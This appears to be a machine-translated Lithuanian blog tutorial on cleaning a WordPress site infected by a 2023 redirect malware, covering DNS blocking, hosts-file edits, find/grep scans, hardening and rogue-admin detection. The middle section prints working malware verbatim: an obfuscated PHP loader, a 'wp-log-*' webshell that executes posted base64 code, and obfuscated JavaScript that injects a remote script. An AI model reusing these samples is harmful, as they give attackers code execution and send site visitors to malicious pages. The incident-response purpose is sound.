Peradresuokite „WordPress Hack 2023“

iki

0

Ištaisykite peradresavimo „WordPress Hack 2023“ („Virus“ peradresavimas)

Ištaisykite peradresavimo „WordPress Hack 2023“ („Virus“ peradresavimas)

0
Peradresuokite „WordPress Hack 2023“

„WordPress“ yra neabejotinai dažniausiai naudojama platforma CMS (Content Management System) tiek tinklaraščiams, tiek pradedančioms internetinėms parduotuvėms (su WooCommerce moduliu), todėl ji yra labiausiai nukreipta į kompiuterines atakas (įsilaužimus). Viena iš dažniausiai naudojamų įsilaužimo operacijų yra nukreipti pažeistą svetainę į kitus tinklalapius. Redirect WordPress Hack 2023 yra palyginti nauja kenkėjiška programa, dėl kurios visa svetainė nukreipiama į šlamšto tinklalapius arba gali užkrėsti vartotojų kompiuterius.

Jei jūsų svetainė, sukurta naudojant „WordPress“, nukreipiama į kitą svetainę, greičiausiai tai yra jau žinomo peradresavimo įsilaužimo auka.

Šiame vadove rasite reikalingos informacijos ir naudingų patarimų, kaip išvalyti peradresavimu užkrėstą svetainę WordPress Hack (Virus Redirect). Komentaruose galite gauti papildomos informacijos arba paprašyti pagalbos.

Virusų aptikimas, kuris peradresuoja „WordPress“ svetaines

Staigus ir nepagrįstas svetainės lankomumo sumažėjimas, užsakymų skaičiaus (internetinių parduotuvių atveju) ar pajamų iš reklamos sumažėjimas yra pirmieji požymiai, kad kažkas negerai. Aptikimas “Redirect WordPress Hack 2023” (Viruso peradresavimas) taip pat galima atlikti “vizualiai” kai atidarote svetainę ir esate nukreipiami į kitą tinklalapį.

Remiantis patirtimi, dauguma žiniatinklio kenkėjiškų programų yra suderinamos su interneto naršyklėmis: Chrome, Firefox, Edge, Opera. Jei esate Mac vartotojas, šie virusai nėra labai matomi Safari naršyklėje. „Safari“ saugos sistema tyliai blokuoja šiuos kenkėjiškus scenarijus.

Ką daryti, jei jūsų svetainė užkrėsta „Redirect WordPress Hack“.

Tikiuosi, kad pirmas žingsnis yra nepanikuoti ir neištrinti svetainės. Net užkrėstų ar virusinių failų iš pradžių nereikėtų ištrinti. Juose yra vertingos informacijos, kuri gali padėti suprasti, kur yra saugumo pažeidimas ir kas paveikė virusą. Modus operandi.

Uždarykite svetainę viešai.

Kaip uždaryti virusų svetainę lankytojams? Paprasčiausia yra naudoti DNS tvarkyklę ir ištrinti jos IP “A” (domeno vardas) arba apibrėžkite jam neegzistuojantį IP. Taigi svetainės lankytojai bus apsaugoti nuo šio „WordPress“ peradresavimo įsilaužimo, kuris gali nuvesti juos į virusų ar SPAM tinklalapius.

Jei naudojate CloudFlare kaip DNS valdytojas, prisijungiate prie savo paskyros ir ištrinate DNS įrašus “A” už domeno vardą. Taigi viruso paveiktas domenas liks be IP, nebebus pasiekiamas iš interneto.

Nukopijuokite svetainės IP ir atlikite “maršrutą” kad tik jūs galėtumėte prieiti prie jo. Iš savo kompiuterio.

Kaip pakeisti tikrąjį svetainės IP „Windows“ kompiuteriuose?

Šis metodas dažnai naudojamas blokuoti prieigą prie tam tikrų svetainių redaguojant failą “šeimininkai”.

1. Atidarykite Notepad arba kitą teksto rengyklę (su administratoriaus teisėmis) ir redaguokite failą “hosts“. Jis įsikūręs:

C:\Windows\System32\drivers\etc\hosts

2. Byloje “šeimininkai” pridėti “maršrutą” į tikrąjį jūsų svetainės IP. IP ištrintas aukščiau iš DNS tvarkyklės.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Išsaugokite failą ir naršyklėje eikite į svetainę.

Jei svetainė neatsidaro ir faile nepadarėte nieko blogo “šeimininkai”, tai greičiausiai DNS talpykla.

Norėdami išvalyti DNS talpyklą „Windows“ operacinėje sistemoje, atidarykite komandų eilutę, kurioje paleiskite komandą:

ipconfig /flushdns

Kaip pakeisti tikrąjį svetainės IP „Mac“ / „MacBook“ kompiuteriuose?

„Mac“ vartotojams yra šiek tiek paprasčiau pakeisti tikrąjį svetainės IP.

1. Atidarykite paslaugų programą Terminal.

2. Vykdykite komandinę eilutę (paleisti reikalingas sistemos slaptažodis):

sudo nano /etc/hosts

3. Kaip ir Windows kompiuteriuose, pridėkite tikrąjį domeno IP.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Išsaugokite pakeitimus. Ctrl+X (y).

Po to, kai tai padarei “maršrutą”, jūs esate vienintelis asmuo, galintis pasiekti užkrėstą svetainę naudodamas „Redirect WordPress Hack“.

Pilna atsarginė svetainė – Failai ir duomenų bazė

Net jei jis yra užsikrėtęs “nukreipti „WordPress“ įsilaužimą”, rekomenduojama pasidaryti bendrą visos svetainės atsarginę kopiją. Failai ir duomenų bazė. Galbūt taip pat galite išsaugoti vietinę abiejų failų kopiją public / public_html taip pat duomenų bazėje.

Virusų naudojamų ir „Redirect WordPress Hack 2023“ modifikuotų failų identifikavimas

Pagrindiniai tiksliniai failai WordPress Aš esu index.php (šaknyje), header.php, index.php ir footer.php aktyvios „WordPress“ temos. Rankiniu būdu patikrinkite šiuos failus ir nustatykite kenkėjišką kodą arba kenkėjiškos programos scenarijų.

2023 metais viruso tipo “Peradresuoti „WordPress Hack“.” įdėti index.php formos kodas:

(Nerekomenduoju naudoti šių kodų!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Iššifruota, tai scenarijaus kenkėjiška programa iš esmės tai yra užkrėstos „WordPress“ svetainės pasekmė. Tai ne scenarijus, esantis už kenkėjiškos programos, o scenarijus, leidžiantis peradresuoti užkrėstą tinklalapį. Jei iššifruosime aukščiau pateiktą scenarijų, gausime:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
Pataisykite „Redirect WordPress Hack 2023“.
Pataisykite „Redirect WordPress Hack 2023“.

Norint identifikuoti visus serveryje esančius failus, kuriuose yra šis kodas, verta turėti prieigą SSH į serverį, kad paleistumėte failų tikrinimo ir valdymo komandų eilutes Linux sistemoje.

Susiję: Kaip sužinoti, ar jūsų tinklaraštis užkrėstas, ar ne, naudojant „Google“ paiešką. („WordPress“ virusas)

Žemiau yra dvi komandos, kurios neabejotinai padeda nustatyti neseniai pakeistus failus ir failus, kuriuose yra tam tikras kodas (eilutė).

Kaip matote PHP failus, pakeistus per pastarąsias 24 valandas ar kitu laikotarpiu Linux sistemoje?

Komanda “find” Tai labai paprasta naudoti ir leidžia tinkinti nustatyti laikotarpį, kelią, kuriuo atliekama paieška, ir failų tipą.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

Išvestyje gausite informaciją apie failo modifikavimo datą ir laiką, rašymo / skaitymo / vykdymo teises (chmod) ir kuriai grupei / vartotojui jis priklauso.

Jei norite patikrinti daugiau dienų, pakeiskite vertę “-mtime -1” arba naudoti “-mmin -360” minutes (6 valandas).

Kaip ieškoti kodo (eilutės) PHP, Java failuose?

Komandinė eilutė “rasti” kurį galite naudoti norėdami greitai rasti visus PHP arba Java failus, kuriuose yra tam tikras kodas, yra taip:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Komanda ieškos ir parodys failus .php ir .js kuriuose yra “uJjBRODYsU“.

Dviejų aukščiau pateiktų komandų pagalba labai lengvai sužinosite, kurie failai buvo neseniai modifikuoti ir kuriuose yra kenkėjiškų programų kodas.

Pašalina kenkėjišką kodą iš modifikuotų failų nepakenkiant teisingam kodui. Pagal mano scenarijų kenkėjiška programa buvo įdėta prieš atidarant <head>.

Vykdant pirmąją komandą “rasti” visai gali būti, kad serveryje atrasite ir naujų failų, kurie nėra WordPress ir nėra jūsų įdėti. Failai, priklausantys Redirect WordPress Hack virusui.

Pagal mano tirtą scenarijų serveryje pasirodė formos failai “wp-log-nOXdgD.php“. Tai yra failai “kartos” kuriuose taip pat yra kenkėjiškų programų kodo, kurį naudoja peradresavimo virusas.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Tipo failų paskirtis “wp-log-*” yra platinti peradresavimo įsilaužimo virusą į kitas serveryje esančias svetaines. Tai kenkėjiškų programų kodas “webshell” sudarytas iš a pagrindinis skyrius (kuriame apibrėžti kai kurie užšifruoti kintamieji) ir o vykdymo skyrius per kurį užpuolikas bando įkelti ir paleisti sistemoje kenkėjišką kodą.

Jei yra kintamasis POST pavadintas ‘bh‘ ir jo užšifruota vertė MD5 yra lygus “8f1f964a4b4d8d1ac3f0386693d28d03“, tada pasirodo, kad scenarijus rašo užšifruotą turinį base64 kito pavadinto kintamojo ‘b3‘ laikinajame faile ir tada bando įtraukti šį laikinąjį failą.

Jei yra kintamasis POST arba GET pavadintas ‘tick“, scenarijus atsakys su verte MD5 iš stygos “885“.

Norėdami identifikuoti visus serverio failus, kuriuose yra šis kodas, pasirinkite eilutę, kuri yra įprasta, tada paleiskite komandą de “find” (panašus į aukščiau pateiktą). Ištrinkite visus failus, kuriuose yra šis kenkėjiškos programos kodas.

Saugos pažeidžiamumas, kurį išnaudojo „Redirect WordPress Hack“.

Greičiausiai šis peradresavimo virusas atvyksta per išnaudojant „WordPress“ administratoriaus vartotoją arba identifikuojant a pažeidžiamas papildinys kuri leidžia pridėti vartotojų su administratoriaus teisėmis.

Daugumoje svetainių, sukurtų „WordPress“ platformoje, tai įmanoma redaguoti temos ar papildinio failusiš administravimo sąsajos (Dashboard). Taigi, kenkėjiškas asmuo gali pridėti kenkėjiškos programos kodą prie temos failų, kad sukurtų aukščiau nurodytus scenarijus.

Tokio kenkėjiškų programų kodo pavyzdys yra šis:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript identifikuojamas WordPress temos antraštėje, iškart atidarius žymą <head>.

Gana sunku iššifruoti šį „JavaScript“, tačiau akivaizdu, kad jis ieško kito žiniatinklio adreso, iš kurio greičiausiai paima kitus scenarijus failams sukurti “wp-log-*” apie kurį kalbėjome aukščiau.

Raskite ir ištrinkite šį kodą iš visų failų PHP paveiktas.

Kiek supratau, šis kodas buvo pridėta rankiniu būdu naujas vartotojas, turintis administratoriaus teises.

Taigi, norint išvengti kenkėjiškų programų kodo pridėjimo iš prietaisų skydelio, geriausia išjungti parinktį redaguoti „WordPress“ temas / papildinius informacijos suvestinėje.

Redaguoti failą wp-config.php ir pridėkite eilutes:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Kai atliksite šį pakeitimą, joks „WordPress“ naudotojas negalės redaguoti failų iš prietaisų skydelio.

Patikrinkite naudotojus, turinčius administratoriaus vaidmenį

Žemiau yra SQL užklausa, kurią galite naudoti norėdami ieškoti administratorių „WordPress“ platformoje:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Ši užklausa pateiks visus lentelėje esančius vartotojus wp_users kuris paskyrė administratoriaus vaidmenį. Užklausa taip pat atliekama dėl lentelės wp_usermeta ieškoti meta ‘wp_capabilities“, kuriame yra informacijos apie vartotojo vaidmenis.

Kitas būdas yra juos atpažinti iš: Dashboard → Users → All Users → Administrator. Tačiau yra praktikos, pagal kurias vartotojas gali būti paslėptas prietaisų skydelio skydelyje. Taigi, geriausias būdas pamatyti vartotojus “Administratorius” iš WordPress yra aukščiau pateikta SQL komanda.

Mano atveju vartotoją atpažinau pagal vardą duomenų bazėje “wp-import-user“. Gana įtaigiai.

WP kenkėjiška programa, blogas vartotojas
WP kenkėjiška programa, blogas vartotojas

Taip pat iš čia galite matyti datą ir laiką, kada buvo sukurtas „WordPress“ vartotojas. Vartotojo ID taip pat yra labai svarbus, nes jis ieško serverio žurnaluose. Taip galite matyti visą šio vartotojo veiklą.

Ištrinkite vartotojus, turinčius administratoriaus vaidmenį ko tu tada nežinai pakeisti slaptažodžius visiems administraciniams vartotojams. Redaktorius, autorius, administratorius.

Pakeiskite SQL duomenų bazės vartotojo slaptažodį paveiktos svetainės.

Atlikus šiuos veiksmus, svetainė gali būti paleista iš naujo visiems vartotojams.

Tačiau atminkite, kad tai, ką pateikiau aukščiau, yra vienas iš galbūt tūkstančių scenarijų, kai svetainė yra užkrėsta „Redirect WordPress Hack“ 2023 m.

Jei jūsų svetainė buvo užkrėsta ir jums reikia pagalbos arba turite klausimų, atidarytas komentarų skyrius.

Ištaisykite peradresavimo „WordPress Hack 2023“ („Virus“ peradresavimas)

Galbūt jus taip pat domina...

Palikite atsakymą

Jūsų el. pašto adresas nebus skelbiamas. Reikalingi laukai yra pažymėti *